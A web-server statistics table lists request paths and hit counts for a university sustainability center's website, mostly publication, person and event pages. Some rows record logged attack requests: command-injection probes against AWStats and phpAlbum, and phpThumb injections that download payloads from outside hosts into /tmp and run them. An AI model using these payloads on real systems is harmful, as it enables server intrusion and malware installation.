| 24 | 0.00 | 0.01% | /publication/aurora-organic-dairy-phase-iii-%E2%80%93-corporate-sustainability-report | |
| 24 | 0.00 | 0.01% | /project/comparative-assessment-wet-and-dry-garment-cleaning-part-i-environmental-and-human-health-as | |
| 24 | 0.00 | 0.01% | /awstatstotals.php | |
| 24 | 0.00 | 0.01% | /awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}} | |
| 24 | 0.00 | 0.01% | /stats/awstats.pl | |
| 24 | 0.00 | 0.01% | /stats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 24 | 0.06 | 0.13% | 0.01% | /css_doc/CSS10-16.pdf |
| 24 | 0.00 | 0.01% | /person/blake-marshall | |
| 24 | 0.00 | 0.01% | /event/2009-academy-management-annual-meeting-green-management-matters | |
| 24 | 0.00 | 0.01% | /apps/phpAlbum/main.php | |
| 24 | 0.00 | 0.01% | /apps/phpAlbum/main.php?cmd=setquality&var1=1'.passthru('id').'; | |
| 24 | 0.00 | 0.01% | /publication/life-cycle-cost-model-evaluating-sustainability-bridge-decks | |
| 24 | 0.00 | 0.01% | /publication/future-red-metal-discards-energy-water-residues-and-depletion | |
| 24 | 0.00 | 0.01% | /event/renewable-energy-project-finance-professional-skills-module | |
| 24 | 0.00 | 0.01% | /phpAlbum/main.php | |
| 24 | 0.00 | 0.01% | /phpAlbum/main.php?cmd=setquality&var1=1'.passthru('id').'; | |
| 24 | 0.00 | 0.01% | /scgi-bin/stats/awstats.pl | |
| 24 | 0.00 | 0.01% | /scgi-bin/stats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 24 | 0.00 | 0.01% | /scripts/awstats.pl | |
| 24 | 0.00 | 0.01% | /scripts/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 24 | 0.00 | 0.01% | /person/keri-dick | |
| 24 | 0.00 | 0.01% | /person/tad-dritz | |
| 24 | 0.00 | 0.01% | /publication/value-remanufactured-engines-life-cycle-environmental-and-economic-perspectives | |
| 24 | 0.00 | 0.01% | /project/2009-cms-energy-internship | |
| 24 | 0.00 | 0.01% | /components/com_hotornot2/phpthumb/phpThumb.php | |
| 14 | 0.00 | 0.01% | /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 | |
| 10 | 0.00 | /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 | ||
| 24 | 0.00 | 0.01% | /publication/michigan-climate-crossroads-strategies-guiding-state-carbon-constrained-world | |
| 24 | 0.00 | 0.01% | /person/amy-cotter | |
| 24 | 0.00 | 0.01% | /person/shinsuke-kodama | |
| 24 | 0.00 | 0.01% | /project/ecotourism-north-america-applied-implications-irwin-lodge | |
| 24 | 0.00 | 0.01% | /publication/sustainable-infrastructure-water-treatment-and-delivery | |
| 24 | 0.00 | 0.01% | /person/oracha-chotimongkol | |
| 24 | 0.00 | 0.01% | /publication/optimizing-vehicle-life-using-life-cycle-energy-analysis-and-dynamic-replacement-modelin | |
| 24 | 0.00 | 0.01% | /event/2010-ucowrniwr-annual-conference-hydrofutures-water-science-technology-and-communities | |
| 24 | 0.00 | 0.01% | /person/tim-gruhl | |
| 24 | 0.00 | 0.01% | /event/world-environmental-water-resources-congress | |
| 24 | 0.00 | 0.01% | /scgi-bin/awstats/awstats.pl | |
| 24 | 0.00 | 0.01% | /scgi-bin/awstats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 24 | 0.00 | 0.01% | /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php | |
| 14 | 0.00 | 0.01% | /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 | |
| 10 | 0.00 | /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 | ||
| 24 | 0.00 | 0.01% | /publication/extreme-value-analysis-wastewater-treatment-plant-flows | |
| 24 | 0.00 | 0.01% | /publication/development-green-engineered-cementitious-composites-sustainable-infrastructure-systems | |
| 24 | 0.00 | 0.01% | /publication/evaluating-environmental-performance-case-study-flat-panel-display-industry | |
| 24 | 0.00 | 0.01% | /person/caroline-de-monasterio | |
| 24 | 0.00 | 0.01% | /person/philip-kukulski | |
| 24 | 0.00 | 0.01% | /publication/life-cycle-assessment-stonyfield-farm-product-delivery-system | |
| 24 | 0.00 | 0.01% | /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php | |
| 14 | 0.00 | 0.01% | /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 | |
| 10 | 0.00 | /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 | ||
| 24 | 0.00 | 0.01% | 0.01% | /css_doc/Ch4.pdf |
| 24 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Chelsea_Ransom.jpg | |
| 24 | 0.00 | 0.01% | /publication/waste-reduction-hospital-sector-case-study-report-mcpherson-hospital | |
| 24 | 0.00 | 0.01% | /publication/evaluation-leed-using-life-cycle-assessment-methods | |
| 24 | 0.00 | 0.01% | /person/samantha-sturhahn | |
| 24 | 0.00 | 0.01% | /scgi/awstats/awstats.pl | |
| 24 | 0.00 | 0.01% | /scgi/awstats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 24 | 0.00 | 0.01% | /publication/automotive-life-cycle-economics-and-replacement-intervals | |
| 23 | 0.00 | 0.01% | /project/life-cycle-analysis-three-steelcase-furniture-models | |
| 23 | 0.00 | 0.01% | /publication/predictive-model-salinity-and-crop-production-jezreel-valley-israel | |
| 23 | 0.00 | 0.01% | /person/brandon-leeper | |
| 23 | 0.00 | 0.01% | /publication/examining-our-progress-university-michigan-ann-arbor-prototype-sustainability-report | |
| 23 | 0.00 | 0.01% | /publication/life-cycle-economics-and-replacement-optimization-generic-us-family-sedan | |
| 23 | 0.00 | 0.01% | /person/craig-cammarata | |
| 23 | 0.00 | 0.01% | /publication/discovering-institutional-drivers-and-barriers-sustainable-concrete-construction | |
| 23 | 0.00 | 0.01% | /publication/decentralized-charging-control-large-populations-plug-electric-vehicles-application-nash | |
| 23 | 0.00 | 0.01% | /publication/css-factsheets-us-material-use | |
| 23 | 0.00 | 0.01% | /publication/model-cost-and-mass-compact-sized-lightweight-automobiles-using-aluminum-high-strength-s | |
| 23 | 0.00 | 0.01% | 0.01% | /css_doc/PIE.pdf |
| 23 | 0.00 | 0.01% | /publication/life-cycle-design-mold-surfacing-film | |
| 23 | 0.00 | 0.01% | /person/malavika-tripathi | |
| 23 | 0.00 | 0.01% | /publication/packaging-and-process-improvements-three-source-reduction-case-studies | |
| 23 | 0.00 | 0.01% | /project/management-end-life-vehicles-elvs-us | |
| 23 | 0.00 | 0.01% | /publication/future-red-metal-scenario-analysis | |
| 23 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/defaultperson_1.jpg | |
| 23 | 0.00 | 0.01% | /publication/css-factsheets-u-m-energy-consumption-and-conservation | |
| 23 | 0.00 | 0.01% | /person/george-t-wolff | |
| 23 | 0.00 | 0.01% | /person/jeff-staudinger | |
| 23 | 0.00 | 0.01% | /person/derek-przybylo | |
| 23 | 0.00 | 0.01% | /person/rachel-permut | |
| 23 | 0.00 | 0.01% | /person/jeff-s-mcdaniel | |
| 23 | 0.00 | 0.01% | /publication/life-cycle-modeling-concrete-bridge-design-comparison-engineered-cementitious-composite- | |
| 23 | 0.00 | 0.01% | /research/researchareas/projects&tid=8 | |
| 23 | 0.00 | 0.01% | /research/researchareas/projects&tid=9 | |
| 23 | 0.00 | 0.01% | /publication/ultra-light-steel-auto-body-advanced-vehicle-concepts-ulsab-avc-life-cycle-inventory-stu | |
| 23 | 0.00 | 0.01% | /publication/implementing-international-environmental-treaties-developing-countries-chinas-compliance | |
| 23 | 0.00 | 0.01% | /publication/automobile-and-environmental-sustainability | |
| 23 | 0.00 | 0.01% | /project/life-cycle-assessment-e-publishing-and-digital-libraries-scholarly-books-and-e-book-reading- | |
| 23 | 0.00 | 0.01% | /person/jordan-garfinkle | |
| 23 | 0.00 | 0.01% | /person/caroline-conway | |
| 23 | 0.00 | 0.01% | /publication/state-monopoly-renewable-portfolio-restructuring-chinas-electric-utility | |
| 23 | 0.00 | 0.01% | /person/cl-harrison | |
| 23 | 0.00 | 0.01% | /publication/life-cycle-energy-and-environmental-benefits-generating-electricity-willow-biomass | |
| 22 | 0.00 | 0.01% | /publication/life-cycle-design | |
| 22 | 0.00 | 0.01% | /assets/Brundtland_Gro_Harlem_bio.pdf | |
| 22 | 0.00 | 0.01% | /publication/evaluating-environmental-performance-case-study-flat-panel-display-industry-0 | |
| 22 | 0.00 | 0.01% | /person/heather-kirshman | |
| 22 | 0.00 | 0.01% | http://css.snre.umich.edu/css_doc/CSS04-08.pdf | |
| 22 | 0.00 | 0.01% | /person/robb-t-beal | |
| 22 | 0.00 | 0.01% | /person/ruchi-misra | |
| 22 | 0.00 | 0.01% | /publication/high-value-wind-method-explore-relationship-between-wind-speed-and-electricity-locationa | |
| 22 | 0.00 | 0.01% | /publication/ultra-light-steel-auto-body-advanced-vehicle-concepts-ulsab-avc-solution-today-engineeri | |
| 22 | 0.00 | 0.01% | /publication/protocol-and-preliminary-greenhouse-gas-ghg-emissions-inventory-steelcase-inc | |
| 22 | 0.00 | 0.01% | /person/jon-koch | |
| 22 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-manifold | |
| 22 | 0.00 | 0.01% | /publication/life-cycle-energy-costs-and-strategies-improving-single-family-house | |
| 22 | 0.00 | 0.01% | /project/land-use-conversion-washtenaw-county-michigan | |
| 22 | 0.00 | 0.01% | /project/performance-four-sustainability-metric-tools-when-applied-renewable-energy-technologies-paci | |
| 22 | 0.00 | 0.01% | /person/scott-austin | |
| 22 | 0.00 | 0.01% | /publication/not-all-primary-aluminum-created-equal-life-cycle-greenhouse-gas-emissions-1990-2005 | |
| 22 | 0.00 | 0.01% | /person/john-willard | |
| 22 | 0.00 | 0.01% | /publication/life-cycle-design-amorphous-silicon-photovoltaic-modules | |
| 22 | 0.00 | 0.01% | /publication/management-end-life-vehicles-elvs-us | |
| 22 | 0.00 | 0.01% | /publication/sustainable-agriculture-farm-assessment-tool | |
| 22 | 0.00 | 0.01% | /person/doyoon-kim | |
| 22 | 0.00 | 0.01% | /person/shamitha-keerthi | |
| 22 | 0.00 | 0.01% | /person/jeffrey-lebrun | |
| 22 | 0.00 | 0.01% | /event/wood-more-sustainable-structural-system | |
| 22 | 0.00 | 0.01% | /publication/life-cycle-optimization-ownership-costs-and-emissions-reduction-us-vehicle-retirement-de | |
| 22 | 0.00 | 0.01% | /publication/charting-course-sustainability-aurora-organic-dairy-%E2%80%93-phase-2-energy-greenhouse-gas-nutr | |
| 22 | 0.00 | 0.01% | /publication/leveraging-non-renewable-fuels-renewable-electricity-generation | |
| 22 | 0.00 | 0.01% | /publication/ultimate-challenge-developing-infrastructure-fuel-cell-vehicles | |
| 22 | 0.00 | 0.01% | /person/becky-schillo | |
| 22 | 0.00 | 0.01% | /publication/css-factsheets-us-energy-system | |
| 22 | 0.00 | 0.01% | /event/integrated-assessment-photovoltaic-technology-use-us-electricity-sector-dissertation-defense | |
| 22 | 0.00 | 0.01% | /person/rebecca-nadel | |
| 22 | 0.00 | 0.01% | /wetweather | |
| 22 | 0.00 | 0.01% | /publication/css-factsheets-carbon-footprint | |
| 22 | 0.00 | 0.01% | /taxonomy/term/5/facts | |
| 22 | 0.00 | 0.01% | /person/ted-ekkers | |
| 22 | 0.00 | 0.01% | /person/jenn-gough | |
| 22 | 0.00 | 0.01% | /person/jody-shaw | |
| 22 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-powertrain-component | |
| 22 | 0.00 | 0.01% | /event/energy-sustainability-targets-strategies-michigan | |
| 22 | 0.00 | 0.01% | /education/education/teaching-resources | |
| 22 | 0.00 | 0.01% | /publication/amorphous-silicon-photovoltaic-modules-life-cycle-design-case-study | |
| 21 | 0.00 | 0.01% | /event/snre-orientation | |
| 21 | 0.00 | 0.01% | /project/automobile-and-environmental-sustainability-state-great-lakes-1999-annual-report | |
| 21 | 0.00 | 0.01% | /publication/lci-modeling-challenges-and-solutions-complex-product-system-mid-sized-automobile | |
| 21 | 0.00 | 0.01% | /event/upper-great-lakes-study-board-meeting-0 | |
| 21 | 0.00 | 0.01% | /person/michael-hartley | |
| 21 | 0.00 | 0.01% | /publication/combined-sewer-overflows-approaches-achieve-regulatory-objectives | |
| 21 | 0.00 | 0.01% | /publication/css-factsheets-us-renewable-energy | |
| 21 | 0.00 | 0.01% | /publication/measuring-progress-developing-standard-campus-performance-metrics | |
| 21 | 0.00 | 0.01% | /publication/integrated-watershed-management-past-present-and-future | |
| 21 | 0.00 | 0.01% | /person/stuart-batterman | |
| 21 | 0.00 | 0.01% | /project/campus-ecology-environmental-performance-assessment-and-reporting-economicology-10-15-20 | |
| 21 | 0.00 | 0.01% | /event/mmpei-campus-visit-general-motors-corp | |
| 21 | 0.00 | 0.01% | /person/rg-hunt | |
| 21 | 0.00 | 0.01% | /event/inventing-clean-energy-future-google | |
| 21 | 0.00 | 0.01% | /event/snre-visit-day-2011 | |
| 21 | 0.00 | 0.01% | /publication/css-factsheets-climate-change-policy-and-mitigation | |
| 21 | 0.00 | 0.01% | /publication/design-green-engineered-cementitious-composites-improved-sustainability | |
| 21 | 0.00 | 0.01% | /project/city-ann-arbor-greenhouse-gas-emissions-reduction-plan | |
| 21 | 0.00 | 0.01% | /person/steve-bielecki | |
| 21 | 0.00 | 0.01% | /person/chuck-l-hornbrook | |
| 21 | 0.00 | 0.01% | /publication/development-sustainability-management-framework-university-michigan-housing-division | |
| 21 | 0.00 | 0.01% | http://css.snre.umich.edu/css_doc/CSS01-17.pdf | |
| 21 | 0.00 | 0.01% | /publication/initiating-hydrogen-infrastructures-preliminary-analysis-sufficient-number-initial-hydro | |
| 21 | 0.00 | 0.01% | /publication/life-cycle-design-air-intake-manifolds-phase-i-20-l-ford-contour-air-intake-manifold | |
| 21 | 0.00 | 0.01% | /person/william-walter | |
| 21 | 0.00 | 0.01% | /person/michelle-manion | |
| 21 | 0.00 | 0.01% | /publication/design-green-engineered-cementitious-composites-pavement-overlay-applications | |
| 21 | 0.00 | 0.01% | /project/wetlands-restoration-masters-project | |
| 21 | 0.00 | 0.01% | /publication/evaluating-impacts-proposed-land-conversion-tool-local-decision-making | |
| 21 | 0.00 | 0.01% | /person/vincent-j-camobreco | |
| 21 | 0.00 | 0.01% | /publication/life-cycle-assessment-modeling-institutional-building-evaluation-bees-20b-software-inter | |
| 21 | 0.00 | 0.01% | /event/engaging-africa-symposium | |
| 21 | 0.00 | 0.01% | /publication/decentralized-charging-control-large-populations-plug-electric-vehicles-application-na-0 | |
| 21 | 0.00 | 0.01% | /publication/state-michigans-general-storm-water-discharge-permit-innovative-approach-contributing-wa | |
| 21 | 0.00 | 0.01% | /publication/life-cycle-optimization-automobile-replacement-model-application | |
| 21 | 0.00 | 0.01% | /publication/life-cycle-optimization-residential-air-conditioner-replacement-masters-thesis | |
| 20 | 0.00 | 0.01% | /event/trans-border-research-university-network-meeting | |
| 20 | 0.00 | 0.01% | /publication/evaluating-land-use-impacts-selection-surface-area-metrics-life-cycle-assessment-mining | |
| 20 | 0.00 | 0.01% | /event/sustainable-pavement-asset-management-methods-based-life-cycle-modeling-and-optimization | |
| 20 | 0.00 | 0.01% | /publication/watershed-planning-and-management-institutional-realities | |
| 20 | 0.00 | 0.01% | /event/sustainable-systems-alive-conversation-series-2 | |
| 20 | 0.00 | 0.01% | /event/sustainable-systems-alive-conversation-series-3 | |
| 20 | 0.00 | 0.01% | /event/sustainable-systems-alive-conversation-series-6 | |
| 20 | 0.00 | 0.01% | /project/directory-pollution-prevention-higher-education-faculty-and-program | |
| 20 | 0.00 | 0.01% | /publication/comparative-assessment-wet-and-dry-garment-cleaning-part-2-performance-economic-and-regu | |
| 20 | 0.00 | 0.01% | /css_doc/CSS01-13.pdf | |
| 20 | 0.01 | 0.03% | 0.01% | /css_doc/CSS97-09.pdf |
| 20 | 0.00 | 0.01% | /person/jessica-lin | |
| 20 | 0.00 | 0.01% | /event/renewable-energy-presentation | |
| 20 | 0.00 | 0.01% | /publication/setting-priorities-and-reducing-risk-application-relative-risk-scoring-approach-toxics-r | |
| 20 | 0.00 | 0.01% | /event/league-women-voters-noon-lunch-allen-creek-greenway | |
| 20 | 0.00 | 0.01% | /publication/life-cycle-energy-and-environmental-analysis-microgrid-power-pavilion | |
| 20 | 0.00 | 0.01% | /event/world-environmental-water-resources-congress-challenges-change | |
| 20 | 0.00 | 0.01% | /publication/community-materials-flow-analysis-case-study-ann-arbor-michigan | |
| 20 | 0.00 | 0.01% | 0.01% | /facts/earthDay2_04.swf |
| 20 | 0.00 | 0.01% | /search/sitesearch/results/field_author:27 | |
| 20 | 0.00 | 0.01% | /publication/risk-reduction-lead-and-mercury-michigan | |
| 20 | 0.00 | 0.01% | /event/transportation-research-board-88th-annual-meeting | |
| 20 | 0.00 | 0.01% | /event/sae-2009-sustainable-mobility-symposium | |
| 20 | 0.00 | 0.01% | /css_doc/CSS11-03.pdf | |
| 20 | 0.00 | 0.01% | /publication/css-factsheets-u-m-air-and-water-pollutant-emissions | |
| 20 | 0.00 | 0.01% | /project/curriculum-development-master-science-degree-alternative-energy-technology | |
| 20 | 0.00 | 0.01% | /publication/economic-analysis-dte-energy-hydrogen-technology-park | |
| 20 | 0.00 | 0.01% | /story/projects | |
| 20 | 0.00 | 0.01% | /person/sandra-rodriguez | |
| 20 | 0.00 | 0.01% | /project/industrial-ecology-automobile-seminar-series | |
| 20 | 0.00 | 0.01% | /person/catie-blackler | |
| 20 | 0.00 | 0.01% | /event/ijc-meeting | |
| 20 | 0.00 | 0.01% | /person/yacov-eren | |
| 20 | 0.00 | 0.01% | /project/demand-analysis-and-optimization-renewable-energy-sustainable-rural-electrification-mbanayil | |
| 20 | 0.00 | 0.01% | /publication/sustainable-water-management-zambezi-river-basin | |
| 20 | 0.00 | 0.01% | /event/sustainability-practical-agenda | |
| 20 | 0.00 | 0.01% | /event/2010-ucowrniwr-annual-conference-hydrofutures-water-science-technology-communities | |
| 20 | 0.00 | 0.01% | /taxonomy/term/4 | |
| 20 | 0.00 | 0.01% | /taxonomy/term/5 | |
| 20 | 0.00 | 0.01% | /taxonomy/term/7 | |
| 20 | 0.00 | 0.01% | /publication/hydrogen-transportation-fuel-produced-thermal-gasification-municipal-solid-waste-examina | |
| 20 | 0.00 | 0.01% | /publication/optimal-fleet-conversion-policy-life-cycle-perspective | |
| 20 | 0.00 | 0.01% | /publication/initiating-hydrogen-infrastructures-analysis-technology-dynamics-during-introduction-hyd | |
| 20 | 0.00 | 0.01% | /event/second-annual-sustainability-fair | |
| 20 | 0.00 | 0.01% | /publication/elucidating-complex-design-and-management-tradeoffs-through-life-cycle-design-air-intake | |
| 20 | 0.00 | 0.01% | /publication/environmental-improvement-automotive-component-design-highly-constrained | |
| 20 | 0.00 | 0.01% | /publication/environmentally-sustainable-non-residential-buildings-sustainability-obstacles-part-ii-p | |
| 20 | 0.00 | 0.01% | /person/arthur-chan | |
| 20 | 0.00 | 0.01% | /person/duane-tolle | |
| 20 | 0.00 | 0.01% | /project/michigan-climate-crossroads-strategies-guiding-state-carbon-constrained-world | |
| 20 | 0.00 | 0.01% | /publication/campus-energy-management-ip-network-feasibility-study-achieving-energy-efficiency-energy | |
| 20 | 0.00 | 0.01% | /event/idetccie-conference-challenging-triangle-engineering-culture-and-experience | |
| 20 | 0.00 | 0.01% | /event/world-environmental-water-resources-congress-0 | |
| 20 | 0.00 | 0.01% | /event/business-plugging | |
| 20 | 0.00 | 0.01% | /publication/guiding-design-and-application-new-materials-enhancing-sustainability-performance-framew | |
| 19 | 0.00 | 0.01% | /publication/waste-reduction-furniture-manufacture-case-study-report-steelcase-inc | |
| 19 | 0.00 | 0.01% | /person/matthew-roman | |
| 19 | 0.00 | 0.01% | /misc/feed.png | |
| 19 | 0.00 | 0.01% | /publication/environmental-reporting-university-michigan-ann-arbor-campus-u-m-environmental-data-repo | |
| 19 | 0.00 | 0.01% | http://css.snre.umich.edu/css_doc/CSS04-15.pdf | |
| 19 | 0.00 | 0.01% | /publication/css-factsheets-greenhouse-gases | |
| 19 | 0.00 | 0.01% | /publication/life-cycle-inventory-study-ultralight-steel-auto-body-advanced-vehicle-concepts-vehicle- | |
| 19 | 0.00 | 0.01% | /publication/examining-benefits-optimal-spatial-diversification-wind-capacity | |
| 19 | 0.00 | 0.01% | /person/jason-macdonald | |
| 19 | 0.00 | 0.01% | /publication/digital-versus-print-energy-performance-selection-and-use-scholarly-journals | |
| 19 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/shelie_miller.jpg | |
| 19 | 0.00 | 0.01% | /person/michael-taylor | |
| 19 | 0.00 | 0.01% | /publication/technical-update-environmental-reporting-university-michigan-ann-arbor-campus-u-m-enviro | |
| 19 | 0.00 | 0.01% | /publication/challenge-higher-education | |
| 19 | 0.00 | 0.01% | /css_doc/Ch7.pdf | |
| 19 | 0.00 | 0.01% | /event/energy-fest | |
| 19 | 0.00 | 0.01% | /publication/economic-assessment-greenhouse-gas-emissions-reduction-vehicle-lightweighting-using-alum | |
| 19 | 0.00 | 0.01% | /publication/global-overview-water-resources-and-distributional-issues | |
| 19 | 0.00 | 0.01% | /sitemap.xml | |
| 19 | 0.00 | 0.01% | /event/upper-great-lakes-study-board-meeting | |
| 19 | 0.00 | 0.01% | /project/optimization-resource-recovery-strategies-i-model-development | |
| 19 | 0.00 | 0.01% | /person/ronald-l-williams | |
| 19 | 0.00 | 0.01% | /person/luis-bravo | |
| 19 | 0.00 | 0.01% | /publication/executive-order-13112-invasive-species | |
| 19 | 0.00 | 0.01% | /person/johnathan-greene | |
| 19 | 0.00 | 0.01% | /publication/developing-power-business-plan-empowering-bottom-pyramid | |
| 19 | 0.00 | 0.01% | /person/lisa-durussel | |
| 19 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/Robb DeKleine.jpg | |
| 19 | 0.00 | 0.01% | /imagefield_assist/thumbs/imagefield_assist_browser | |
| 19 | 0.00 | 0.01% | /publication/printed-scholarly-books-and-e-book-reading-devices-comparative-life-cycle-assessment-tw-0 | |
| 19 | 0.00 | 0.01% | /publication/megaquarry-vs-decentralized-mineral-production-network-analysis-cement-production-great- | |
| 19 | 0.00 | 0.01% | /person/dahlia-chazan | |
| 19 | 0.00 | 0.01% | 0.01% | /css_doc/CSS10-10.pdf |
| 19 | 0.00 | 0.01% | /publication/environmental-law-exploring-influence-engineering-design | |
| 19 | 0.00 | 0.01% | /person/krish-kar | |
| 19 | 0.00 | 0.01% | /publication/life-cycle-energy-and-environmental-analysis-nextenergy-microgrid-pavilion | |
| 19 | 0.00 | 0.01% | /publication/sustainable-infrastructure-material-design | |
| 19 | 0.00 | 0.01% | /person/seth-epstein | |
| 19 | 0.00 | 0.01% | /person/david-am-russell | |
| 19 | 0.00 | 0.01% | /project/binational-great-lakes-studies-program-and-summit-emerging-canadian-and-us-issues | |
| 19 | 0.00 | 0.01% | /event/ijc-workshop-uglsb | |
| 19 | 0.00 | 0.01% | /event/adaptive-management-workshop-upper-great-lakes-study-board | |
| 18 | 0.00 | 0.01% | /person/rebecca-l-messick | |
| 18 | 0.00 | 0.01% | /project/life-cycle-design-criteria-engine-oil-filers-allied-signal-case%0B-studies%0B | |
| 18 | 0.00 | 0.01% | /story/byresearchsectors | |
| 18 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-instrument-panel | |
| 18 | 0.00 | 0.01% | /person/andy-lubershane | |
| 18 | 0.00 | 0.01% | /publication/community-materials-flow-analysis-case-study-ann-arbor-michigan-0 | |
| 18 | 0.00 | 0.01% | /education/internship_application | |
| 18 | 0.00 | 0.01% | /publication/css-factsheets-climate-change-science-and-impacts | |
| 18 | 0.00 | 0.01% | /person/lee-g-glascoe | |
| 18 | 0.00 | 0.01% | /publication/economic-and-environmental-evaluations-life-cycle-cost-analysis-practices-case-study-mic | |
| 18 | 0.00 | 0.01% | /event/warm-center-annual-breakfast | |
| 18 | 0.00 | 0.01% | /publication/charting-course-sustainability-aurora-organic-dairy-phase-1-energy-greenhouse-gas-life-c | |
| 18 | 0.00 | 0.01% | /event/um-shanghai-jiao-tong-meeting | |
| 18 | 0.00 | 0.01% | /publication/integrated-lca-lcc-model-evaluating-concrete-infrastructure-sustainability | |
| 18 | 0.00 | 0.01% | /publication/life-cycle-design-instrument-panels-common-sense-approach | |
| 18 | 0.00 | 0.01% | /publication/development-steelcase-wood-products-manufacturing-division-environmental-performance-mea | |
| 18 | 0.00 | 0.01% | /publication/waste-reduction-food-retail-case-study-report-peoples-food-co-op | |
| 18 | 0.00 | 0.01% | /publication/life-cycle-analysis-residential-home-michigan | |
| 18 | 0.00 | 0.01% | /publication/future-red-metal-developing-country-perspective-india | |
| 18 | 0.00 | 0.01% | /project/setting-priorities-and-reducing-risk-application-relative-risk-scoring-approach-toxics-relea | |
| 18 | 0.00 | 0.01% | /publication/whole-building-life-cycle-energy-and-environmental-impacts-dominance-energy-and-water-se | |
| 18 | 0.00 | 0.01% | /project/technological-innovations-industrially-designed-and-manufactured-modular-housing-concept-low | |
| 18 | 0.00 | 0.01% | /publication/impacts-lead-michigan | |
| 18 | 0.00 | 0.01% | /publication/evaluation-alternative-closure-options-stonyfield-farm-product-delivery-systems-suppleme | |
| 18 | 0.00 | 0.01% | /event/u-m-energy-workshop-forging-alliances-positioning-opportunity | |
| 18 | 0.00 | 0.01% | /person/duncan | |
| 18 | 0.00 | 0.01% | /project/protocol-and-preliminary-greenhouse-gas-emissions-inventory-steelcase-inc | |
| 18 | 0.00 | 0.01% | /person/john-m-macarthur | |
| 18 | 0.00 | 0.01% | 0.01% | /sites/css.snre.umich.edu/files/ifa_upload/wege lecture poster.jpg |
| 18 | 0.00 | 0.01% | /publication/life-cycle-model-evaluating-sustainability-concrete-infrastructure-systems | |
| 18 | 0.00 | 0.01% | /person/sharina-mapleton | |
| 18 | 0.00 | 0.01% | /person/margaret-k-mann | |
| 18 | 0.00 | 0.01% | /publication/environmentally-sustainable-non-residential-buildings-sustainability-indicators-part-i-p | |
| 18 | 0.00 | 0.01% | /person/william-m-hix | |
| 18 | 0.00 | 0.01% | http://css.snre.umich.edu/css_doc/CSS03-07.pdf | |
| 18 | 0.00 | 0.01% | /person/ruth-polk | |
| 18 | 0.00 | 0.01% | /person/kathy-nemsick | |
| 18 | 0.00 | 0.01% | /taxonomy/term/8 | |
| 18 | 0.00 | 0.01% | /event/symposium-control-modeling-alternative-energy-systems | |
| 18 | 0.00 | 0.01% | /person/john-d-mutton | |
| 18 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Zhongjing_Ma_0.jpg | |
| 18 | 0.00 | 0.01% | /project/compendia-project | |
| 18 | 0.00 | 0.01% | /event/panatal-center-education-and-research-summer-work-presentation | |
| 18 | 0.00 | 0.01% | /publication/transition-hydrogen-based-transportation-china-lessons-learned-alternative-fuel-vehicle- | |
| 18 | 0.00 | 0.01% | /event/earthfest-2010-party-planet-0 | |
| 18 | 0.00 | 0.01% | /event/international-symposium-sustainable-systems-and-technology-issst | |
| 18 | 0.00 | 0.01% | /publication/assessment-nature-and-frequency-epas-activities-pollution-prevention-end-pipe-treatment- | |
| 18 | 0.00 | 0.01% | /person/tertia-speiser | |
| 18 | 0.00 | 0.01% | /event/wet-weather-meeting | |
| 18 | 0.00 | 0.01% | /person/dimitri-shanin | |
| 18 | 0.00 | 0.01% | /event/life-cycle-and-technological-progress-models-alternative-energy-infrastructures | |
| 17 | 0.00 | 0.01% | /publication/dynamic-modeling-cement-use-stocks-united-states | |
| 17 | 0.00 | 0.01% | /publication/renewable-energy-bhp-billiton-framework-and-application-bhp-billitons-global-assets | |
| 17 | 0.00 | 0.01% | /person/betsy-han | |
| 17 | 0.00 | 0.01% | /publication/biomass-and-chinas-carbon-emissions-missing-piece-carbon-decomposition | |
| 17 | 0.00 | 0.01% | /publication/waste-reduction-case-studies-final-project-report | |
| 17 | 0.00 | 0.01% | /person/david-halsing | |
